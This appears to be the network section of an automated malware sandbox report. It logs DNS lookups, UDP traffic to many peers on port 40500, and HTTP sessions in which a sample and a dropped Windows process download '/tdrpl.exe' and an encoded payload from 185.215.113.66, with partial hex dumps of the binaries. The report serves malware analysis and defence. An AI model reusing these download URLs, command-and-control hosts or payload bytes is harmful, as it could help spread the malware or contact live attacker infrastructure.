                                                                                                                                                                                                    Oct 26, 2024 07:28:45.585371017 CEST8054606185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521729946 CEST8054606185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521750927 CEST8054606185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521763086 CEST8054606185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521775961 CEST8054606185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521787882 CEST8054606185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521795988 CEST5460680192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521800041 CEST8054606185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521811962 CEST8054606185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521821022 CEST8054606185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521826982 CEST5460680192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.521867037 CEST5460680192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.523068905 CEST5460680192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:28:46.523092031 CEST5460680192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:28:51.271506071 CEST515254399185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:28:51.317080021 CEST543995152192.168.2.8185.215.113.66

                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.632179022 CEST6289240500192.168.2.890.156.162.72
                                                                                                                                                                                                    Oct 26, 2024 07:26:45.664796114 CEST6289240500192.168.2.889.218.184.42
                                                                                                                                                                                                    Oct 26, 2024 07:26:46.481014967 CEST53619611.1.1.1192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:50.678122044 CEST6289240500192.168.2.846.100.182.167
                                                                                                                                                                                                    Oct 26, 2024 07:26:55.678177118 CEST6289240500192.168.2.894.230.236.63
                                                                                                                                                                                                    Oct 26, 2024 07:27:00.136794090 CEST5359907162.159.36.2192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:00.678302050 CEST6289240500192.168.2.8117.236.188.177
                                                                                                                                                                                                    Oct 26, 2024 07:27:00.770570040 CEST5119853192.168.2.81.1.1.1
                                                                                                                                                                                                    Oct 26, 2024 07:27:00.778481007 CEST53511981.1.1.1192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:05.699435949 CEST6289240500192.168.2.892.46.228.246
                                                                                                                                                                                                    Oct 26, 2024 07:27:10.693866014 CEST6289240500192.168.2.894.230.235.140
                                                                                                                                                                                                    Oct 26, 2024 07:27:15.695331097 CEST6289240500192.168.2.8198.163.192.16
                                                                                                                                                                                                    Oct 26, 2024 07:27:20.723366976 CEST6289240500192.168.2.82.178.73.57
                                                                                                                                                                                                    Oct 26, 2024 07:27:25.735733986 CEST6289240500192.168.2.895.59.165.102
                                                                                                                                                                                                    Oct 26, 2024 07:27:30.785458088 CEST6289240500192.168.2.8185.131.95.169
                                                                                                                                                                                                    Oct 26, 2024 07:27:35.772454977 CEST6289240500192.168.2.859.91.192.122
                                                                                                                                                                                                    Oct 26, 2024 07:27:40.776669025 CEST6289240500192.168.2.895.58.91.70
                                                                                                                                                                                                    Oct 26, 2024 07:27:45.790839911 CEST6289240500192.168.2.890.156.160.86
                                                                                                                                                                                                    Oct 26, 2024 07:27:50.787678957 CEST6289240500192.168.2.8187.133.73.5
                                                                                                                                                                                                    Oct 26, 2024 07:27:51.534137964 CEST5773653192.168.2.81.1.1.1
                                                                                                                                                                                                    Oct 26, 2024 07:27:51.543512106 CEST53577361.1.1.1192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:27:55.828944921 CEST6289240500192.168.2.895.56.76.10
                                                                                                                                                                                                    Oct 26, 2024 07:28:00.840056896 CEST6289240500192.168.2.85.232.31.242
                                                                                                                                                                                                    Oct 26, 2024 07:28:05.854111910 CEST6289240500192.168.2.8198.163.193.230
                                                                                                                                                                                                    Oct 26, 2024 07:28:10.868046999 CEST6289240500192.168.2.85.133.123.159
                                                                                                                                                                                                    Oct 26, 2024 07:28:15.884665966 CEST6289240500192.168.2.892.46.174.254
                                                                                                                                                                                                    Oct 26, 2024 07:28:20.890779018 CEST6289240500192.168.2.85.202.213.167
                                                                                                                                                                                                    Oct 26, 2024 07:28:25.992217064 CEST6289240500192.168.2.8217.30.162.161

                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                    Oct 26, 2024 07:27:00.770570040 CEST192.168.2.81.1.1.10x35c9Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                    Oct 26, 2024 07:27:51.534137964 CEST192.168.2.81.1.1.10xebd5Standard query (0)twizthash.netA (IP address)IN (0x0001)false

                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                    Oct 26, 2024 07:27:00.778481007 CEST1.1.1.1192.168.2.80x35c9Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                    Oct 26, 2024 07:27:51.543512106 CEST1.1.1.1192.168.2.80xebd5No error (0)twizthash.net185.215.113.66A (IP address)IN (0x0001)false

                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                    • 185.215.113.66
                                                                                                                                                                                                    • 185.215.113.84
                                                                                                                                                                                                    • 91.202.233.141

                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    0192.168.2.849704185.215.113.66803780C:\Users\user\Desktop\lJ4EzPSKMj.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.091034889 CEST282OUTGET /tdrpl.exe HTTP/1.1
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.995786905 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:26:28 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 85504
                                                                                                                                                                                                    Last-Modified: Sun, 20 Oct 2024 18:13:32 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "6715484c-14e00"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a4 84 07 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ee 00 00 00 70 00 00 00 00 00 00 40 79 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$mpj)9)9)9 9.9Q8+9C9+9A9(99+9s9-9)99e9<9 9-9 959 9(9Rich)9PELgp@y@p|0.text `.rdata?@@@.data.@2@
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.995851040 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b 6c 24 08 8b 45 20 56 33 f6 57 8b 7c 24 20 85 c0 74 1c 8b 4f 04 39 08 75 0a 66
                                                                                                                                                                                                    Data Ascii: Ul$E V3W|$ tO9ufPf;Wt@uu"j GfOfNU Vu L$|$FD$PQtuS$NrdF;wX}xttSWTAuD$$MPSWU
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.995922089 CEST1236INData Raw: 00 8b f0 6a 01 6a 00 c7 06 70 64 75 00 c7 46 04 00 00 00 00 ff 15 98 00 41 00 6a 11 6a 02 6a 02 89 46 10 ff 15 34 02 41 00 89 46 08 83 f8 ff 75 0b 56 e8 5b fe ff ff 83 c4 04 33 f6 85 f6 0f 84 90 00 00 00 33 c0 89 44 24 0e 89 44 24 12 89 44 24 16
                                                                                                                                                                                                    Data Ascii: jjpduFAjjjF4AFuV[33D$D$D$fD$D$ WD$fL$0AjT$(RjfD$D$0FhPAVjL$QRAuV^[3_jjVh@jj^AF^[_FS2Ul$;Fv
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.995959044 CEST1236INData Raw: 24 51 52 50 ff 15 54 02 41 00 f6 44 24 24 08 74 6d 83 7c 24 34 00 75 66 81 3b 50 43 4f 49 75 5e 8b 43 14 8d 4c 24 10 51 8d 54 24 18 52 50 c7 44 24 1c 10 00 00 00 ff 15 68 02 41 00 83 f8 ff 74 3d 50 8b c3 e8 05 09 00 00 8b f0 83 c4 04 85 f6 74 2c
                                                                                                                                                                                                    Data Ascii: $QRPTAD$$tm|$4uf;PCOIu^CL$QT$RPD$hAt=Pt,dQS3ktu>ilciu=4At$+=r>s VA{8t$`tuVAVAr+='rgC PAs8tBjVR
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.995994091 CEST1236INData Raw: 00 01 5f 5e 83 c4 1c c3 80 bf 75 02 00 00 00 74 10 83 c6 14 56 ff 15 64 00 41 00 5f 5e 83 c4 1c c3 01 5e 28 8b 46 28 3b 46 24 73 15 01 5e 20 29 5e 1c 57 e8 62 fc ff ff 83 c4 04 5f 5e 83 c4 1c c3 8d 56 14 52 ff 15 64 00 41 00 8b 8f 68 02 00 00 8b
                                                                                                                                                                                                    Data Ascii: _^utVdA_^^(F(;F$s^ )^Wb_^VRdAhldL$xT$V0L$D$pT$|L$QD$F(RD$(W_^VdAjT$,RhfD$4`h3PufL$>A`Q
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996030092 CEST1236INData Raw: f0 83 c4 04 85 f6 0f 84 97 00 00 00 8d 44 24 14 50 8d 8e 64 02 00 00 51 55 c7 06 69 6c 63 69 89 ae 60 02 00 00 c7 44 24 20 10 00 00 00 ff 15 6c 02 41 00 8b 57 08 8b 86 60 02 00 00 6a 00 56 52 50 ff 15 cc 00 41 00 3b 47 08 75 4c e8 b5 bb 00 00 50
                                                                                                                                                                                                    Data Ascii: D$PdQUilci`D$ lAW`jVRPA;GuLPNQhADVP|$(A<W\A5^[_]V3U-^[_]Vt$t:>ilciu2tu)|@P\AL$tx
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996067047 CEST1236INData Raw: 00 00 83 c4 14 89 45 f8 8b 4d fc 51 8b 55 08 8b 02 50 e8 6b 0e 00 00 83 c4 08 8b 4d 08 89 41 04 8b 45 f8 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 83 7d 08 01 73 07 c7 45 08 01 00 00 00 8b 45 08 c1 e0 02 50 e8 13 81 00 00 83 c4 04
                                                                                                                                                                                                    Data Ascii: EMQUPkMAE]UQ}sEEPEE]UE8tMRE]UE%EMMUUE%EMMUEEEMMMUU
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996095896 CEST36INData Raw: 45 08 8b 48 04 2b ca 8b 55 08 89 4a 04 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08
                                                                                                                                                                                                    Data Ascii: EH+UJ]U
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996129036 CEST1236INData Raw: 56 c7 45 fc 00 00 00 00 c7 45 f8 00 00 00 00 eb 09 8b 45 f8 83 c0 01 89 45 f8 8b 4d f8 3b 4d 14 73 6d 8b 55 f8 8b 45 0c 8b 0c 90 03 4d fc 8b 55 f8 8b 45 08 89 0c 90 8b 4d f8 8b 55 08 8b 04 8a 3b 45 fc 73 09 c7 45 fc 01 00 00 00 eb 07 c7 45 fc 00
                                                                                                                                                                                                    Data Ascii: VEEEEM;MsmUEMUEMU;EsEEMUMUMUEMUu;sMME^]UEEMMEUUE9EsMUEEEM;M
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996165991 CEST1236INData Raw: 08 8b 45 f0 89 04 8a 83 7d f8 00 74 30 8b 4d d0 8b 55 08 8b 04 8a 83 e8 01 8b 4d d0 8b 55 08 89 04 8a 8b 45 fc 50 8b 4d 18 51 8b 55 d4 52 8b 45 d4 50 e8 ef fa ff ff 83 c4 10 89 45 f8 8b 4d d0 03 4d fc 8b 55 e4 8b 44 8a fc 89 45 dc e9 4a fe ff ff
                                                                                                                                                                                                    Data Ascii: E}t0MUMUEPMQUREPEMMUDEJMMUUEE9E}MUEPMQUREPMQUREPMQ3]U}uEEEEEM;MU
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.001545906 CEST1236INData Raw: 0e 8b 4d 0c 83 c1 01 89 4d 0c 8b 45 0c eb 04 eb d4 33 c0 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 10 83 7d 08 00 74 06 83 7d 0c 00 75 04 33 c0 eb 66 8b 45 0c 50 8b 4d 08 51 e8 9d ff ff ff 83 c4 08 89 45 f8 83 7d f8 00 75 04 33
                                                                                                                                                                                                    Data Ascii: MME3]U}t}u3fEPMQE}u3IEEUUEE}vMUD#EtM+MME]UQVEEEM;MsUEMu^]UEEMU


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    1192.168.2.849705185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:26:37.735831022 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.661850929 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:26:38 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 110600
                                                                                                                                                                                                    Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "66f3a94a-1b008"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.661880016 CEST212INData Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
                                                                                                                                                                                                    Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.661928892 CEST1236INData Raw: 83 e4 d1 90 29 7c aa 52 61 69 3e 26 79 cf e3 2b a4 eb a0 86 89 ee 8f 0a 65 18 75 20 96 42 1b 55 48 d4 6a a3 7b 79 30 ed be 6d a7 6c 87 55 ef 22 c3 f5 94 c8 33 a5 83 53 2b c4 c3 b9 90 cf 8a 0c fc cb a5 49 29 7e ad f0 f9 35 44 58 bc b7 23 1f 6f 26
                                                                                                                                                                                                    Data Ascii: )|Rai>&y+eu BUHj{y0mlU"3S+I)~5DX#o&n3_$by<DLy/9o-T&ge1c80G~q!&Q{[Y`,OCG"GX! (|h'RTg$^,u1^*qd*cQm3PwL&izY
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.661950111 CEST1236INData Raw: 02 73 94 7c 14 0e aa f5 e2 b8 40 61 24 1a 40 15 ef 62 57 45 85 0a 95 13 1c 99 a6 67 55 34 b3 4c e3 6c c9 df 4c b8 f9 00 9a a1 41 71 99 93 d4 bc b8 1e a9 35 3b 7a a6 23 40 95 fb d1 4d 91 a1 81 38 02 69 ff 64 38 a9 5b 0c b3 79 81 37 2a d8 94 b2 70
                                                                                                                                                                                                    Data Ascii: s|@a$@bWEgU4LlLAq5;z#@M8id8[y7*pZN$S<[Z88Al5r6^9Cko+@bk$>@|#}_XkeTl~Kyyx.d;XbbE7PF-Pedz}
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.661968946 CEST1236INData Raw: 17 5f 0f 70 34 1e ae a2 24 cb 91 81 c7 90 a6 02 38 63 65 e1 35 a7 5c 4a fc a5 a0 41 7c fa ab ec 4d 5a 7a a8 cd f3 9d 2c c0 4a b6 e1 08 2d bf 09 5a 6f 0c 55 f3 a1 ca 08 53 b9 2d 96 2c f5 54 d0 f6 e9 c7 e4 16 91 cf 60 d5 69 da 3f 60 78 a9 71 63 5b
                                                                                                                                                                                                    Data Ascii: _p4$8ce5\JA|MZz,J-ZoUS-,T`i?`xqc[)2~pHTV 6RCju.,jA E8xY8hLJPi|Kl3KK?OnV& KyL1d6Y0m~ ?LOR9.0Dd
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.661992073 CEST1236INData Raw: 02 b8 4f 45 e4 dc 85 5c 77 64 f6 c3 28 61 e2 66 9b ed fc 10 0b a8 19 72 63 40 c3 28 e9 51 10 17 b4 30 ee 42 af 06 1c 4a 85 b0 2a ec 47 0f 32 d2 86 d0 1c d3 5e 7b b7 1f 33 07 6b 7b 24 d5 3f 84 69 dd 1a c6 6d 55 ff 95 4d 1d 72 62 64 03 d5 d6 f5 c7
                                                                                                                                                                                                    Data Ascii: OE\wd(afrc@(Q0BJ*G2^{3k{$?imUMrbd<58qqH!]C'L l~FseDp?X76J^\=onk=\HmyYcEJI4B15't=ec
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662017107 CEST1236INData Raw: be 81 cf d2 c8 a9 98 64 38 5b 48 e6 06 39 50 b7 43 45 3d ac a2 e6 c3 59 fb 1b bf 14 aa fe 64 94 02 43 ff 0c 0f 1c 94 09 2f 2f 8a c0 37 fa 4d 6f 1b d7 c0 3a 5f 5b ed 6e e8 14 55 34 e5 ee f8 a6 e2 26 2d 14 2b 8a f2 54 ef 86 95 b6 07 f3 f1 c8 33 55
                                                                                                                                                                                                    Data Ascii: d8[H9PCE=YdC//7Mo:_[nU4&-+T3U,%S!&C+?0p[}f*5&hj5[@Bq\h6s0s`W}j;Ko7:duXW=m: "iQ`jLrzg(
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662039995 CEST760INData Raw: 47 4d 97 1f b9 c7 fb 8b b8 c1 1e a9 53 07 71 4d 23 9b d2 8d 26 40 9e 1a 5f 28 96 06 38 ba 40 ee df d5 99 8c 8d 30 3c 9b 11 58 9c 1e fc 9b 48 82 51 d7 75 3f 39 38 b9 8f 1f bf 6b 69 e2 b5 18 cb 72 fd f4 17 1c 26 5b 51 bc 83 ce 8a 4d 72 79 27 36 15
                                                                                                                                                                                                    Data Ascii: GMSqM#&@_(8@0<XHQu?98kir&[QMry'6YUk8G['kY.@?i3t&MkQ_DWc!=|Wx)ML<`injM's)+]t/Iu#(R<*n0g%hV`G
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662061930 CEST1236INData Raw: 9a c9 09 ee b7 6f 50 fa 82 b4 70 79 a3 b8 fa c9 b1 ae bd 40 d1 a1 8a de 55 90 a9 f4 24 c0 02 8d 93 66 d1 5e 0c 00 8b 7b 71 5b fc 42 13 48 51 f8 cb c1 3a cc 3e b2 3a 81 76 3c 09 44 6d 41 a7 85 a3 5b 0d 15 f8 4d c8 a8 3d bd 4e 48 10 9f 49 22 3d 7b
                                                                                                                                                                                                    Data Ascii: oPpy@U$f^{q[BHQ:>:v<DmA[M=NHI"={`!a}j&C'Xe^X.t~>,lmhPA~FEwOU{|i1MnMXf{KE&.@0/:asZ>S+<h:!|(0+u
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662084103 CEST212INData Raw: 06 54 e2 53 ce ad 37 05 df aa 64 12 96 09 bf 24 9f 11 be bb b9 e6 36 6e 0f 18 5e b2 cc b9 b5 eb f3 08 20 6f 75 cb fe b7 6a bf b7 d6 aa dc 0f e1 7e 0d 30 8d 83 58 df 1d 76 18 81 ea bb 80 8a 41 24 45 19 71 0b e5 3c b2 17 e8 42 fa a6 37 16 5c 23 21
                                                                                                                                                                                                    Data Ascii: TS7d$6n^ ouj~0XvA$Eq<B7\#!``g~{(>i]D5n6EVl;7VtOl[cCS2r);->yxRC"f>+7&;Gp$n
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.667640924 CEST1236INData Raw: c2 4c 60 0b d7 cb f0 d8 83 14 4e 23 48 d4 6d 8f d7 8f 1b 9f ce 6c 50 b1 54 d5 16 2d fe 84 be 7c 42 ce 06 b0 b8 13 5a c2 0a 92 aa 42 38 6f 5f 06 9e c8 9b 4b 16 a5 d7 7a 4f 72 44 d1 e5 fd 4c a1 5a 78 0d d5 0b 65 9d fb 99 7c 2e 09 41 89 22 b8 82 c5
                                                                                                                                                                                                    Data Ascii: L`N#HmlPT-|BZB8o_KzOrDLZxe|.A"]Hg-g9$SNg+#>r ZG+t=DLIU^[YA]Fg&k~u)}{fQ_y\PfC\UcI%+15&tB5x`:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    2192.168.2.849707185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:26:39.764664888 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654144049 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:26:40 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 110600
                                                                                                                                                                                                    Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "66f3a94a-1b008"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
